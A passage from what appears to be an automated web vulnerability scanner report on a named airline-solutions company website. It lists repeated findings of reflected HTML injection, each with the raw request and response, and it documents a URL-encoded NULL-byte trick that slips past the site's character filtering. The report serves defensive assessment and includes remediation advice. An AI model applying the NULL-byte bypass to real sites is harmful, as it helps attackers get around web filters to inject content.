Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A46%3A%22%2Fnews_events%2Fevent%2Foperations_user_conference%2F%22%3Bi%3A1%3Bs%3A55%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_res%2F%22%3Bi%3A2%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A3%3Bs%3A55%3A%22%2Fproducts_services%2Fservices%2Fdelivery_and_customer_care%2F%22%3Bi%3A4%3Bs%3A60%3A%22%2Fproducts_services%2Fproduct%2Fsabre_aircentre_recovery_manager%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:23:33 GMT
Pragma: no-cache
Content-Length: 6093
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="/home/news_events/event/operations_user_conference?%00ae971"><a>710f86d987f=1">
...[SNIP]...

3.107. http://www.sabreairlinesolutions.com/home/news_events/event/operations_user_conference2 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/news_events/event/operations_user_conference2

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0053da6"><a>69ed5e196d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 53da6"><a>69ed5e196d9 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/news_events/event/operations_user_conference2?%0053da6"><a>69ed5e196d9=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: exp_last_visit=970952799; exp_last_activity=1286312799; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 17:05:32 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1286316332; expires=Wed, 05-Oct-2011 17:05:32 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Foperations_user_conference2%2F%22%3Bi%3A1%3Bs%3A5%3A%22index%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 05 Oct 2010 17:05:49 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 16860

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="/home/news_events/event/operations_user_conference2?%0053da6"><a>69ed5e196d9=1">
...[SNIP]...

3.108. http://www.sabreairlinesolutions.com/home/news_events/event/sabre_airmax_group_manager_user_conference [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/news_events/event/sabre_airmax_group_manager_user_conference

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %005dcdb<a>b490fc50a32 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5dcdb<a>b490fc50a32 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/news_events/event/sabre_airmax_group_manager_user_conference?%005dcdb<a>b490fc50a32=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/news_events/events/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322312; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A59%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_loyalty%2F%22%3Bi%3A1%3Bs%3A38%3A%22%2Fbusiness_issues%2Firregular_operations%2F%22%3Bi%3A2%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A3%3Bs%3A48%3A%22%2Fproducts_services%2Fservices%2Fconsulting_services%2F%22%3Bi%3A4%3Bs%3A69%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_maintenance%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:28:48 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322312; expires=Thu, 06-Oct-2011 09:28:50 GMT; path=/
Set-Cookie: exp_last_activity=1286375330; expires=Thu, 06-Oct-2011 09:28:50 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A62%3A%22%2Fnews_events%2Fevent%2Fsabre_airmax_group_manager_user_conference%2F%22%3Bi%3A1%3Bs%3A59%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_loyalty%2F%22%3Bi%3A2%3Bs%3A38%3A%22%2Fbusiness_issues%2Firregular_operations%2F%22%3Bi%3A3%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fservices%2Fconsulting_services%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:29:11 GMT
Pragma: no-cache
Content-Length: 6157
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a>b490fc50a32=1">sabre airmax group manager user conference?%005dcdb<a>b490fc50a32=1</a>
...[SNIP]...

3.109. http://www.sabreairlinesolutions.com/home/news_events/event/sabre_airmax_group_manager_user_conference [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/news_events/event/sabre_airmax_group_manager_user_conference

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %005d2c1"><a>4ad3ce3d1ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5d2c1"><a>4ad3ce3d1ba in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/news_events/event/sabre_airmax_group_manager_user_conference?%005d2c1"><a>4ad3ce3d1ba=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/news_events/events/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322312; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A59%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_loyalty%2F%22%3Bi%3A1%3Bs%3A38%3A%22%2Fbusiness_issues%2Firregular_operations%2F%22%3Bi%3A2%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A3%3Bs%3A48%3A%22%2Fproducts_services%2Fservices%2Fconsulting_services%2F%22%3Bi%3A4%3Bs%3A69%3A%22%2Fproducts_services%2Fenterprise_operations%2Fsabre_aircentre_maintenance%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:24:34 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322312; expires=Thu, 06-Oct-2011 09:24:47 GMT; path=/
Set-Cookie: exp_last_activity=1286375085; expires=Thu, 06-Oct-2011 09:24:47 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A62%3A%22%2Fnews_events%2Fevent%2Fsabre_airmax_group_manager_user_conference%2F%22%3Bi%3A1%3Bs%3A59%3A%22%2Fproducts_services%2Fairline_reservations%2Fsabresonic_loyalty%2F%22%3Bi%3A2%3Bs%3A38%3A%22%2Fbusiness_issues%2Firregular_operations%2F%22%3Bi%3A3%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fservices%2Fconsulting_services%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:24:51 GMT
Pragma: no-cache
Content-Length: 6161
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="/home/news_events/event/sabre_airmax_group_manager_user_conference?%005d2c1"><a>4ad3ce3d1ba=1">
...[SNIP]...

3.110. http://www.sabreairlinesolutions.com/home/news_events/event/sabre_developers_conference [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/news_events/event/sabre_developers_conference

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %004724d<a>de69e323185 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4724d<a>de69e323185 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/news_events/event/sabre_developers_conference?%004724d<a>de69e323185=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/news_events/events/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322323; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3Bi%3A1%3Bs%3A50%3A%22%2Fproducts_services%2Fairline_reservations%2Fecommerce%2F%22%3Bi%3A2%3Bs%3A38%3A%22%2Fbusiness_issues%2Firregular_operations%2F%22%3Bi%3A3%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fservices%2Fconsulting_services%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:19:27 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322323; expires=Thu, 06-Oct-2011 09:19:29 GMT; path=/
Set-Cookie: exp_last_activity=1286374769; expires=Thu, 06-Oct-2011 09:19:29 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A1%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3Bi%3A2%3Bs%3A50%3A%22%2Fproducts_services%2Fairline_reservations%2Fecommerce%2F%22%3Bi%3A3%3Bs%3A38%3A%22%2Fbusiness_issues%2Firregular_operations%2F%22%3Bi%3A4%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:19:47 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 27214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a>de69e323185=1">sabre developers conference?%004724d<a>de69e323185=1</a>
...[SNIP]...

3.111. http://www.sabreairlinesolutions.com/home/news_events/event/sabre_developers_conference [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/news_events/event/sabre_developers_conference

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %009ed1a"><a>8673101f51b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9ed1a"><a>8673101f51b in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/news_events/event/sabre_developers_conference?%009ed1a"><a>8673101f51b=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/news_events/events/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286322323; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3Bi%3A1%3Bs%3A50%3A%22%2Fproducts_services%2Fairline_reservations%2Fecommerce%2F%22%3Bi%3A2%3Bs%3A38%3A%22%2Fbusiness_issues%2Firregular_operations%2F%22%3Bi%3A3%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3Bi%3A4%3Bs%3A48%3A%22%2Fproducts_services%2Fservices%2Fconsulting_services%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:14:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286322323; expires=Thu, 06-Oct-2011 09:14:44 GMT; path=/
Set-Cookie: exp_last_activity=1286374484; expires=Thu, 06-Oct-2011 09:14:44 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A47%3A%22%2Fnews_events%2Fevent%2Fsabre_developers_conference%2F%22%3Bi%3A1%3Bs%3A49%3A%22%2Fproducts_services%2Fsabre_reaccommodation_manager%2F%22%3Bi%3A2%3Bs%3A50%3A%22%2Fproducts_services%2Fairline_reservations%2Fecommerce%2F%22%3Bi%3A3%3Bs%3A38%3A%22%2Fbusiness_issues%2Firregular_operations%2F%22%3Bi%3A4%3Bs%3A66%3A%22%2Fproducts_services%2Ftechnology%2Fsabre_asx_airline_services_exchange%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:15:09 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 27218

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="/home/news_events/event/sabre_developers_conference?%009ed1a"><a>8673101f51b=1">
...[SNIP]...

3.112. http://www.sabreairlinesolutions.com/home/news_events/event/sabresonic_global_conference2 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/news_events/event/sabresonic_global_conference2

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00fa4dd"><a>9d5dbf18594 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fa4dd"><a>9d5dbf18594 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/news_events/event/sabresonic_global_conference2?%00fa4dd"><a>9d5dbf18594=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286320657; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Tue, 05 Oct 2010 19:47:55 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_activity=1286326075; expires=Wed, 05-Oct-2011 19:47:55 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A49%3A%22%2Fnews_events%2Fevent%2Fsabresonic_global_conference2%2F%22%3Bi%3A1%3Bs%3A13%3A%22%2Fnews_events%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 05 Oct 2010 19:48:07 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html
Content-Length: 20578

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="/home/news_events/event/sabresonic_global_conference2?%00fa4dd"><a>9d5dbf18594=1">
...[SNIP]...

3.113. http://www.sabreairlinesolutions.com/home/news_events/events [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/news_events/events

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %001a64e<a>01c1bfa4f75 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1a64e<a>01c1bfa4f75 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/news_events/events?%001a64e<a>01c1bfa4f75=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321531; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A38%3A%22%2Fcontact%2Fproduct_support_and_services%2F%22%3Bi%3A3%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A4%3Bs%3A36%3A%22%2Fabout%2Fexecutive_team%2Fellen_ehrlich%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:19:25 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321531; expires=Thu, 06-Oct-2011 09:19:26 GMT; path=/
Set-Cookie: exp_last_activity=1286374766; expires=Thu, 06-Oct-2011 09:19:26 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fnews_events%2Fevents%2F%22%3Bi%3A1%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A38%3A%22%2Fcontact%2Fproduct_support_and_services%2F%22%3Bi%3A4%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:19:47 GMT
Pragma: no-cache
Content-Length: 7604
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a>01c1bfa4f75=1">events?%001a64e<a>01c1bfa4f75=1</a>
...[SNIP]...

3.114. http://www.sabreairlinesolutions.com/home/news_events/events [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/news_events/events

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00d477e"><a>99c5e77902a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d477e"><a>99c5e77902a in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /home/news_events/events?%00d477e"><a>99c5e77902a=1 HTTP/1.1
Host: www.sabreairlinesolutions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.sabreairlinesolutions.com/home/about/sitemap/
Cookie: __utmz=178985382.1286295079.1.1.utmcsr=sabretravelnetwork.com|utmccn=(referral)|utmcmd=referral|utmcct=/home/products_services/travel_supplier/airline/support/; __utma=178985382.1791953520.1286295079.1286295079.1286295079.1; exp_last_visit=1286313086; __utmc=178985382; exp_last_activity=1286321531; __utmb=178985382.2.10.1286295079; exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A2%3Bs%3A38%3A%22%2Fcontact%2Fproduct_support_and_services%2F%22%3Bi%3A3%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3Bi%3A4%3Bs%3A36%3A%22%2Fabout%2Fexecutive_team%2Fellen_ehrlich%2F%22%3B%7D;

Response

HTTP/1.1 200 OK
Date: Wed, 06 Oct 2010 09:14:37 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: exp_last_visit=1286321531; expires=Thu, 06-Oct-2011 09:14:37 GMT; path=/
Set-Cookie: exp_last_activity=1286374477; expires=Thu, 06-Oct-2011 09:14:37 GMT; path=/
Set-Cookie: exp_tracker=a%3A5%3A%7Bi%3A0%3Bs%3A20%3A%22%2Fnews_events%2Fevents%2F%22%3Bi%3A1%3Bs%3A7%3A%22%2Fabout%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fabout%2Fpage_not_found_404%2F%22%3Bi%3A3%3Bs%3A38%3A%22%2Fcontact%2Fproduct_support_and_services%2F%22%3Bi%3A4%3Bs%3A18%3A%22%2Fascend%2Fsubscribe%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 06 Oct 2010 09:15:02 GMT
Pragma: no-cache
Content-Length: 7608
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a href="/home/news_events/events?%00d477e"><a>99c5e77902a=1">
...[SNIP]...

3.115. http://www.sabreairlinesolutions.com/home/news_events/events/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sabreairlinesolutions.com
Path:   /home/news_events/events/

Issue detail

